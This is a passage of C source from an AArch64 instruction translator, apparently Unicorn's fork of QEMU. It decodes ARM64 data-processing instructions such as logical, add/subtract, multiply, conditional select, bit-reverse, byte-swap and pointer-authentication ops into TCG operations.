*tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, enum a64_shift_type shift_type, TCGv_i64 shift_amount) { switch (shift_type) { case A64_SHIFT_TYPE_LSL: tcg_gen_shl_i64(tcg_ctx, dst, src, shift_amount); break; case A64_SHIFT_TYPE_LSR: tcg_gen_shr_i64(tcg_ctx, dst, src, shift_amount); break; case A64_SHIFT_TYPE_ASR: if (!sf) { tcg_gen_ext32s_i64(tcg_ctx, dst, src); } tcg_gen_sar_i64(tcg_ctx, dst, sf ? src : dst, shift_amount); break; case A64_SHIFT_TYPE_ROR: if (sf) { tcg_gen_rotr_i64(tcg_ctx, dst, src, shift_amount); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t0, src); tcg_gen_extrl_i64_i32(tcg_ctx, t1, shift_amount); tcg_gen_rotr_i32(tcg_ctx, t0, t0, t1); tcg_gen_extu_i32_i64(tcg_ctx, dst, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } break; default: assert(FALSE); /* all shift types should be handled */ break; } if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, dst, dst); } } /* Shift a TCGv src by immediate, put result in dst. * The shift amount must be in range (this should always be true as the * relevant instructions will UNDEF on bad shift immediates). */ static void shift_reg_imm(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, enum a64_shift_type shift_type, unsigned int shift_i) { assert(shift_i < (sf ? 64 : 32)); if (shift_i == 0) { tcg_gen_mov_i64(tcg_ctx, dst, src); } else { TCGv_i64 shift_const; shift_const = tcg_const_i64(tcg_ctx, shift_i); shift_reg(tcg_ctx, dst, src, sf, shift_type, shift_const); tcg_temp_free_i64(tcg_ctx, shift_const); } } /* Logical (shifted register) * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 * +----+-----+-----------+-------+---+------+--------+------+------+ * | sf | opc | 0 1 0 1 0 | shift | N | Rm | imm6 | Rn | Rd | * +----+-----+-----------+-------+---+------+--------+------+------+ */ static void disas_logic_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn, tcg_rm; unsigned int sf, opc, shift_type, invert, rm, shift_amount, rn, rd; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); shift_type = extract32(insn, 22, 2); invert = extract32(insn, 21, 1); rm = extract32(insn, 16, 5); shift_amount = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (!sf && (shift_amount & (1 << 5))) { unallocated_encoding(s); return; } tcg_rd = cpu_reg(s, rd); if (opc == 1 && shift_amount == 0 && shift_type == 0 && rn == 31) { /* Unshifted ORR and ORN with WZR/XZR is the standard encoding for * register-register MOV and MVN, so it is worth special casing. */ tcg_rm = cpu_reg(s, rm); if (invert) { tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rm); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } else { if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_rm); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rm); } } return; } tcg_rm = read_cpu_reg(s, rm, sf); if (shift_amount) { shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, shift_amount); } tcg_rn = cpu_reg(s, rn); switch (opc | (invert << 2)) { case 0: /* AND */ case 3: /* ANDS */ tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 1: /* ORR */ tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 2: /* EOR */ tcg_gen_xor_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 4: /* BIC */ case 7: /* BICS */ tcg_gen_andc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 5: /* ORN */ tcg_gen_orc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 6: /* EON */ tcg_gen_eqv_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; default: assert(FALSE); break; } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } if (opc == 3) { gen_logic_CC(tcg_ctx, sf, tcg_rd); } } /* * Add/subtract (extended register) * * 31|30|29|28 24|23 22|21|20 16|15 13|12 10|9 5|4 0| * +--+--+--+-----------+-----+--+-------+------+------+----+----+ * |sf|op| S| 0 1 0 1 1 | opt | 1| Rm |option| imm3 | Rn | Rd | * +--+--+--+-----------+-----+--+-------+------+------+----+----+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * opt: 00 * option: extension type (see DecodeRegExtend) * imm3: optional shift to Rm * * Rd = Rn + LSL(extend(Rm), amount) */ static void disas_add_sub_ext_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm3 = extract32(insn, 10, 3); int option = extract32(insn, 13, 3); int rm = extract32(insn, 16, 5); int opt = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool sf = extract32(insn, 31, 1); TCGv_i64 tcg_rm, tcg_rn; /* temps */ TCGv_i64 tcg_rd; TCGv_i64 tcg_result; if (imm3 > 4 || opt != 0) { unallocated_encoding(s); return; } /* non-flag setting ops may use SP */ if (!setflags) { tcg_rd = cpu_reg_sp(s, rd); } else { tcg_rd = cpu_reg(s, rd); } tcg_rn = read_cpu_reg_sp(s, rn, sf); tcg_rm = read_cpu_reg(s, rm, sf); ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, option, imm3); tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } } else { if (sub_op) { gen_sub_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } else { gen_add_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } } if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* * Add/subtract (shifted register) * * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 * +--+--+--+-----------+-----+--+-------+---------+------+------+ * |sf|op| S| 0 1 0 1 1 |shift| 0| Rm | imm6 | Rn | Rd | * +--+--+--+-----------+-----+--+-------+---------+------+------+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * shift: 00 -> LSL, 01 -> LSR, 10 -> ASR, 11 -> RESERVED * imm6: Shift amount to apply to Rm before the add/sub */ static void disas_add_sub_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm6 = extract32(insn, 10, 6); int rm = extract32(insn, 16, 5); int shift_type = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool sf = extract32(insn, 31, 1); TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn, tcg_rm; TCGv_i64 tcg_result; if ((shift_type == 3) || (!sf && (imm6 > 31))) { unallocated_encoding(s); return; } tcg_rn = read_cpu_reg(s, rn, sf); tcg_rm = read_cpu_reg(s, rm, sf); shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, imm6); tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } } else { if (sub_op) { gen_sub_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } else { gen_add_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } } if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* Data-processing (3 source) * * 31 30 29 28 24 23 21 20 16 15 14 10 9 5 4 0 * +--+------+-----------+------+------+----+------+------+------+ * |sf| op54 | 1 1 0 1 1 | op31 | Rm | o0 | Ra | Rn | Rd | * +--+------+-----------+------+------+----+------+------+------+ */ static void disas_data_proc_3src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int ra = extract32(insn, 10, 5); int rm = extract32(insn, 16, 5); int op_id = (extract32(insn, 29, 3) << 4) | (extract32(insn, 21, 3) << 1) | extract32(insn, 15, 1); bool sf = extract32(insn, 31, 1); bool is_sub = extract32(op_id, 0, 1); bool is_high = extract32(op_id, 2, 1); bool is_signed = false; TCGv_i64 tcg_op1; TCGv_i64 tcg_op2; TCGv_i64 tcg_tmp; /* Note that op_id is sf:op54:op31:o0 so it includes the 32/64 size flag */ switch (op_id) { case 0x42: /* SMADDL */ case 0x43: /* SMSUBL */ case 0x44: /* SMULH */ is_signed = true; break; case 0x0: /* MADD (32bit) */ case 0x1: /* MSUB (32bit) */ case 0x40: /* MADD (64bit) */ case 0x41: /* MSUB (64bit) */ case 0x4a: /* UMADDL */ case 0x4b: /* UMSUBL */ case 0x4c: /* UMULH */ break; default: unallocated_encoding(s); return; } if (is_high) { TCGv_i64 low_bits = tcg_temp_new_i64(tcg_ctx); /* low bits discarded */ TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn = cpu_reg(s, rn); TCGv_i64 tcg_rm = cpu_reg(s, rm); if (is_signed) { tcg_gen_muls2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); } else { tcg_gen_mulu2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); } tcg_temp_free_i64(tcg_ctx, low_bits); return; } tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_tmp = tcg_temp_new_i64(tcg_ctx); if (op_id < 0x42) { tcg_gen_mov_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_mov_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } else { if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_ext32s_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_ext32u_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } } if (ra == 31 && !is_sub) { /* Special-case MADD with rA == XZR; it is the standard MUL alias */ tcg_gen_mul_i64(tcg_ctx, cpu_reg(s, rd), tcg_op1, tcg_op2); } else { tcg_gen_mul_i64(tcg_ctx, tcg_tmp, tcg_op1, tcg_op2); if (is_sub) { tcg_gen_sub_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); } else { tcg_gen_add_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); } } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rd)); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Add/subtract (with carry) * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 10 9 5 4 0 * +--+--+--+------------------------+------+-------------+------+-----+ * |sf|op| S| 1 1 0 1 0 0 0 0 | rm | 0 0 0 0 0 0 | Rn | Rd | * +--+--+--+------------------------+------+-------------+------+-----+ */ static void disas_adc_sbc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, setflags, rm, rn, rd; TCGv_i64 tcg_y, tcg_rn, tcg_rd; sf = extract32(insn, 31, 1); op = extract32(insn, 30, 1); setflags = extract32(insn, 29, 1); rm = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (op) { tcg_y = new_tmp_a64(s); tcg_gen_not_i64(tcg_ctx, tcg_y, cpu_reg(s, rm)); } else { tcg_y = cpu_reg(s, rm); } if (setflags) { gen_adc_CC(tcg_ctx, sf, tcg_rd, tcg_rn, tcg_y); } else { gen_adc(tcg_ctx, sf, tcg_rd, tcg_rn, tcg_y); } } /* * Rotate right into flags * 31 30 29 21 15 10 5 4 0 * +--+--+--+-----------------+--------+-----------+------+--+------+ * |sf|op| S| 1 1 0 1 0 0 0 0 | imm6 | 0 0 0 0 1 | Rn |o2| mask | * +--+--+--+-----------------+--------+-----------+------+--+------+ */ static void disas_rotate_right_into_flags(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = extract32(insn, 0, 4); int o2 = extract32(insn, 4, 1); int rn = extract32(insn, 5, 5); int imm6 = extract32(insn, 15, 6); int sf_op_s = extract32(insn, 29, 3); TCGv_i64 tcg_rn; TCGv_i32 nzcv; if (sf_op_s != 5 || o2 != 0 || !dc_isar_feature(aa64_condm_4, s)) { unallocated_encoding(s); return; } tcg_rn = read_cpu_reg(s, rn, 1); tcg_gen_rotri_i64(tcg_ctx, tcg_rn, tcg_rn, imm6); nzcv = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, nzcv, tcg_rn); if (mask & 8) { /* N */ tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, 31 - 3); } if (mask & 4) { /* Z */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 4); } if (mask & 2) { /* C */ tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, 1, 1); } if (mask & 1) { /* V */ tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, 31 - 0); } tcg_temp_free_i32(tcg_ctx, nzcv); } /* * Evaluate into flags * 31 30 29 21 15 14 10 5 4 0 * +--+--+--+-----------------+---------+----+---------+------+--+------+ * |sf|op| S| 1 1 0 1 0 0 0 0 | opcode2 | sz | 0 0 1 0 | Rn |o3| mask | * +--+--+--+-----------------+---------+----+---------+------+--+------+ */ static void disas_evaluate_into_flags(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int o3_mask = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int o2 = extract32(insn, 15, 6); int sz = extract32(insn, 14, 1); int sf_op_s = extract32(insn, 29, 3); TCGv_i32 tmp; int shift; if (sf_op_s != 1 || o2 != 0 || o3_mask != 0xd || !dc_isar_feature(aa64_condm_4, s)) { unallocated_encoding(s); return; } shift = sz ? 16 : 24; /* SETF16 or SETF8 */ tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, cpu_reg(s, rn)); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_NF, tmp, shift); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tmp, shift - 1); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); } /* Conditional compare (immediate / register) * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ * |sf|op| S| 1 1 0 1 0 0 1 0 |imm5/rm | cond |i/r |o2| Rn |o3|nzcv | * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ * [1] y [0] [0] */ static void disas_cc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, y, cond, rn, nzcv, is_imm; TCGv_i32 tcg_t0, tcg_t1, tcg_t2; TCGv_i64 tcg_tmp, tcg_y, tcg_rn; DisasCompare c; if (!extract32(insn, 29, 1)) { unallocated_encoding(s); return; } if (insn & (1 << 10 | 1 << 4)) { unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); op = extract32(insn, 30, 1); is_imm = extract32(insn, 11, 1); y = extract32(insn, 16, 5); /* y = rm (reg) or imm5 (imm) */ cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); nzcv = extract32(insn, 0, 4); /* Set T0 = !COND. */ tcg_t0 = tcg_temp_new_i32(tcg_ctx); arm_test_cc(tcg_ctx, &c, cond); tcg_gen_setcondi_i32(tcg_ctx, tcg_invert_cond(c.cond), tcg_t0, c.value, 0); arm_free_cc(tcg_ctx, &c); /* Load the arguments for the new comparison. */ if (is_imm) { tcg_y = new_tmp_a64(s); tcg_gen_movi_i64(tcg_ctx, tcg_y, y); } else { tcg_y = cpu_reg(s, y); } tcg_rn = cpu_reg(s, rn); /* Set the flags for the new comparison. */ tcg_tmp = tcg_temp_new_i64(tcg_ctx); if (op) { gen_sub_CC(tcg_ctx, sf, tcg_tmp, tcg_rn, tcg_y); } else { gen_add_CC(tcg_ctx, sf, tcg_tmp, tcg_rn, tcg_y); } tcg_temp_free_i64(tcg_ctx, tcg_tmp); /* If COND was false, force the flags to #nzcv. Compute two masks * to help with this: T1 = (COND ? 0 : -1), T2 = (COND ? -1 : 0). * For tcg hosts that support ANDC, we can make do with just T1. * In either case, allow the tcg optimizer to delete any unused mask. */ tcg_t1 = tcg_temp_new_i32(tcg_ctx); tcg_t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, tcg_t1, tcg_t0); tcg_gen_subi_i32(tcg_ctx, tcg_t2, tcg_t0, 1); if (nzcv & 8) { /* N */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t1); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t2); } } if (nzcv & 4) { /* Z */ if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t2); } } else { tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t0); } if (nzcv & 2) { /* C */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t0); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t2); } } if (nzcv & 1) { /* V */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t1); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t2); } } tcg_temp_free_i32(tcg_ctx, tcg_t0); tcg_temp_free_i32(tcg_ctx, tcg_t1); tcg_temp_free_i32(tcg_ctx, tcg_t2); } /* Conditional select * 31 30 29 28 21 20 16 15 12 11 10 9 5 4 0 * +----+----+---+-----------------+------+------+-----+------+------+ * | sf | op | S | 1 1 0 1 0 1 0 0 | Rm | cond | op2 | Rn | Rd | * +----+----+---+-----------------+------+------+-----+------+------+ */ static void disas_cond_select(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, else_inv, rm, cond, else_inc, rn, rd; TCGv_i64 tcg_rd, zero; DisasCompare64 c; if (extract32(insn, 29, 1) || extract32(insn, 11, 1)) { /* S == 1 or op2<1> == 1 */ unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); else_inv = extract32(insn, 30, 1); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); else_inc = extract32(insn, 10, 1); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); tcg_rd = cpu_reg(s, rd); a64_test_cc(tcg_ctx, &c, cond); zero = tcg_const_i64(tcg_ctx, 0); if (rn == 31 && rm == 31 && (else_inc ^ else_inv)) { /* CSET & CSETM. */ tcg_gen_setcond_i64(tcg_ctx, tcg_invert_cond(c.cond), tcg_rd, c.value, zero); if (else_inv) { tcg_gen_neg_i64(tcg_ctx, tcg_rd, tcg_rd); } } else { TCGv_i64 t_true = cpu_reg(s, rn); TCGv_i64 t_false = read_cpu_reg(s, rm, 1); if (else_inv && else_inc) { tcg_gen_neg_i64(tcg_ctx, t_false, t_false); } else if (else_inv) { tcg_gen_not_i64(tcg_ctx, t_false, t_false); } else if (else_inc) { tcg_gen_addi_i64(tcg_ctx, t_false, t_false, 1); } tcg_gen_movcond_i64(tcg_ctx, c.cond, tcg_rd, c.value, zero, t_true, t_false); } tcg_temp_free_i64(tcg_ctx, zero); a64_free_cc(tcg_ctx, &c); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } static void handle_clz(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { tcg_gen_clzi_i64(tcg_ctx, tcg_rd, tcg_rn, 64); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); tcg_gen_clzi_i32(tcg_ctx, tcg_tmp32, tcg_tmp32, 32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } static void handle_cls(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { tcg_gen_clrsb_i64(tcg_ctx, tcg_rd, tcg_rn); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); tcg_gen_clrsb_i32(tcg_ctx, tcg_tmp32, tcg_tmp32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } static void handle_rbit(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn; tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (sf) { gen_helper_rbit64(tcg_ctx, tcg_rd, tcg_rn); } else { TCGv_i32 tcg_tmp32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp32, tcg_rn); gen_helper_rbit(tcg_ctx, tcg_tmp32, tcg_tmp32); tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_tmp32); tcg_temp_free_i32(tcg_ctx, tcg_tmp32); } } /* REV with sf==1, opcode==3 ("REV64") */ static void handle_rev64(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sf) { unallocated_encoding(s); return; } tcg_gen_bswap64_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rn)); } /* REV with sf==0, opcode==2 * REV32 (sf==1, opcode==2) */ static void handle_rev32(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd = cpu_reg(s, rd); if (sf) { TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); /* bswap32_i64 requires zero high word */ tcg_gen_ext32u_i64(tcg_ctx, tcg_tmp, tcg_rn); tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_tmp); tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 32); tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); tcg_gen_concat32_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rn)); tcg_gen_bswap32_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* REV16 (opcode==1) */ static void handle_rev16(DisasContext *s, unsigned int sf, unsigned int rn, unsigned int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rn = read_cpu_reg(s, rn, sf); TCGv_i64 mask = tcg_const_i64(tcg_ctx, sf ? 0x00ff00ff00ff00ffull : 0x00ff00ff); tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_rn, 8); tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, mask); tcg_gen_and_i64(tcg_ctx, tcg_tmp, tcg_tmp, mask); tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, 8); tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp); tcg_temp_free_i64(tcg_ctx, mask); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Data-processing (1 source) * 31 30 29 28 21 20 16 15 10 9 5 4 0 * +----+---+---+-----------------+---------+--------+------+------+ * | sf | 1 | S | 1 1 0 1 0 1 1 0 | opcode2 | opcode | Rn | Rd | * +----+---+---+-----------------+---------+--------+------+------+ */ static void disas_data_proc_1src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, opcode, opcode2, rn, rd; TCGv_i64 tcg_rd; if (extract32(insn, 29, 1)) { unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); opcode = extract32(insn, 10, 6); opcode2 = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); #define MAP(SF, O2, O1) ((SF) | (O1 << 1) | (O2 << 7)) switch (MAP(sf, opcode2, opcode)) { case MAP(0, 0x00, 0x00): /* RBIT */ case MAP(1, 0x00, 0x00): handle_rbit(s, sf, rn, rd); break; case MAP(0, 0x00, 0x01): /* REV16 */ case MAP(1, 0x00, 0x01): handle_rev16(s, sf, rn, rd); break; case MAP(0, 0x00, 0x02): /* REV/REV32 */ case MAP(1, 0x00, 0x02): handle_rev32(s, sf, rn, rd); break; case MAP(1, 0x00, 0x03): /* REV64 */ handle_rev64(s, sf, rn, rd); break; case MAP(0, 0x00, 0x04): /* CLZ */ case MAP(1, 0x00, 0x04): handle_clz(s, sf, rn, rd); break; case MAP(0, 0x00, 0x05): /* CLS */ case MAP(1, 0x00, 0x05): handle_cls(s, sf, rn, rd); break; case MAP(1, 0x01, 0x00): /* PACIA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x01): /* PACIB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacib(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x02): /* PACDA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacda(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x03): /* PACDB */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_pacdb(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } break; case MAP(1, 0x01, 0x04): /* AUTIA */ if (s->pauth_active) { tcg_rd = cpu_reg(s, rd); gen_helper_autia(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, tcg_rd, cpu_reg_sp(s, rn)); } else if 